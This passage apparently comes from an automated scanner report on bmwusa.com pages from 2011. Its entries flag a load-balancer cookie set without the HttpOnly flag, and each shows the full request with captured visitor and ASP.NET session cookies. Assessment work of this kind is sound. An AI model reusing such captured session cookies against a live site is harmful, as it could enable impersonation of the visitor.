Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:23:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:43:30 GMT;path=/
Content-Length: 214786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.223. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:45:45 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:25:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:45:45 GMT;path=/
Content-Length: 202076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.224. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:24:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:20 GMT;path=/
Content-Length: 214910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.225. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:29 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:29 GMT;path=/
Content-Length: 202153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.226. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:39 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:39 GMT;path=/
Content-Length: 202155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.227. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:01 GMT;path=/
Content-Length: 214935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.228. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:11 GMT;path=/
Content-Length: 225966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.229. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:19 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:19 GMT;path=/
Content-Length: 215092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.230. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:36 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:36 GMT;path=/
Content-Length: 202376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.231. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:46:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:26:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:46:20 GMT;path=/
Content-Length: 215070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.232. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:37 GMT;path=/
Content-Length: 225949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.233. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:47:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:27:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:47:15 GMT;path=/
Content-Length: 216307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.234. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:59 GMT;path=/
Content-Length: 202183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.235. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:38 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
